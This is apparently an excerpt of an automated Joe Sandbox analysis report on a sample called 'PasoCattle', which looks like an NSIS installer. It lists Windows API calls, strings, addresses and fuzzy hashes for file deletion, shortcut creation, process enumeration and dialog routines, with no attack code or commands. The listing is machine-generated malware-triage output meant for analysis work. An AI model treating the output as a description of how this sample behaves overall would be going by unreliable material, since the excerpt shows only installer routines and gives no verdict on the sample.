                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                        Strings
                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                        Strings
                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                        • API String ID: 20674999-2124804629
                                                                                                                                                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                        APIs
                                                                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                        • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                        • String ID: F$N$open
                                                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
